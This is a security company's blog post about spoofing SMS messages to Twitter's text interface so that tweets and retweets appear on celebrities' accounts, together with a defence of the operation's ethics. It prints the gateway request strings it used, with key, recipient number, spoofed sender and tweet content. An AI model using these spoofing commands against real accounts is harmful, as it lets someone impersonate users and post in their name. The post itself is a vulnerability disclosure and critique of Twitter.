Twitter Research — PT2

If you’re reading this then you’ve probably seen the recent research carried out by INSINIA where we successfully “hijacked” a number of Twitter accounts, including Louis Theroux and Eamonn Holmes.

Most (if not all) of the articles written about the operation have been mostly factual and accurate. You can see some of them here: BBC, The Mirror, The Telegraph.

No Plagiarism Here

INSINIA has publicly warned about using SMS for anything for over 6 years. We have been researching SS7, GSM, CDMA etc for over 15 years.

INSINIA demonstrated this proof of concept as a company to LBC in 2014, to the BBC in 2015 and to multiple media outlets since. In 2018 we warned about the same flaws in the cell network, and we warned that the attack was over 20 years old and that thousands of systems were susceptible to SMS spoofing attacks.

SEE HERE: https://www.telegraph.co.uk/technology/2018/03/08/mobile-networks-investigate-flaw-leaves-4g-customers-open-hacking/

AND HERE: https://www.telegraph.co.uk/technology/2018/11/16/tens-millions-private-text-messages-security-codes-exposed/

@mikeghacks tweeting about these issues in November — 8 weeks before the recent Twitter operation.

INSINIA is very lucky to have a devoted and highly capable team of specialists who make up our SRT (Security Research Team) which is based in Copenhagen, Denmark. When a member of the team had seen a tweet from CCC (Chaos Computer Club), which highlighted the issue with SMS and Twitter once again, it became apparent that we were in a position to demonstrate this research to the public in a meaningful and hard hitting way. Utilising a range of techniques around number enumeration and by developing a multi-faceted methodology, we knew we could make it work.

The Approach

INSINIA looked into the possible lifecycle of the research.
What would be required, how would it be executed and is it ethical and responsible?

The campaign had to meet the following criteria:

1. Minimal impact and non malicious
   No access to data, no account takeover, no denial of service, no personal interaction etc. If there was even a possibility for us to view, intercept or access data, we would not have carried out this research.
2. The effected users had to know straight away that they were NOT under genuine attack, that they had NOT lost access to their account and it had to be done in a way that would not cause users to be excessively or unduly alarmed.
3. It must not intercept or change any user data whatsoever. It had to be what we call passive — half-duplex — similar to push-to-talk. One way communication only.

The Preparation

1. We contacted the user, notifying them of what was about to happen.
2. We sent a passive command in order to send the tweet.
3. We then retweeted INSINIA’s Tweet with a link to our original blog post, in order to explain what’s happened to them and how it’s done.
4. We offered to provide support to anyone who was concerned about the attack or wanted additional information on how to protect and secure themselves.

Executing the Plan

Sending the Initial Command
This command would allow us to tweet from the users account. It was a simple command with FROM being the users phone number, TO being the Twitter interface number and the message being the Tweet. This is how it looked:

key=a0tg9d5c682fff8293n2bhds62jd23k6k88jd&to=07537417668&from=07USERNUMB&content=This account has been temporarily hijacked by INSINIA SECURITY.
To: 447537417668 ID: CF_29482k21

Once the command was sent, the tweet would appear.

Tweet appearing on Louis Theroux’s account after sending the above command.

The tweet may seem self promoting but we actually mentioned INSINIA SECURITY for a totally different reason…

How could we let people know straight away that this is non-malicious?

Tweeting “This account has been ethically hacked” without direction to INSINIA would have potentially been as damaging as a malicious attack. How would anyone know it was ethical? It was therefore decided that the best way to proceed would be with full accountability. We would take full responsibility and decided to place INSINIA front and centre to give users an immediate place to contact and an immediate opportunity to understand exactly what had happened.

Retweeting our Tweet
In order to ensure that people knew exactly where to go, we developed a tweet that would be retweeted from the users account. The tweet made it clear that this operation has been to highlight a vulnerability in Twitter and that the user of the account had not lost access to it, had not been “breached” or “hacked” in the traditional sense and was not under sustained or malicious attack.

CMD to retweet:
key=a0tg9d5c682fff8293n2bhds62jd23k6k88jd&to=07537417668&from=07USERNUMB&content=RETWEET insiniasec
To: 447537417668 ID: CF_37622d98

Retweet from INSINIA Security using the above command.

Conclusion

Twitter has known about this since at least 2012 and has done nothing to warn users that they are unacceptably vulnerable and exposed. Twitter are having to take notice of this problem once again as the BBC and many others are pressing them for statements.

There is a fine line here but when companies like Twitter fail to act in the best interest of their users for over 6 years, then surely we must ask ourselves, what else can we do?

XC018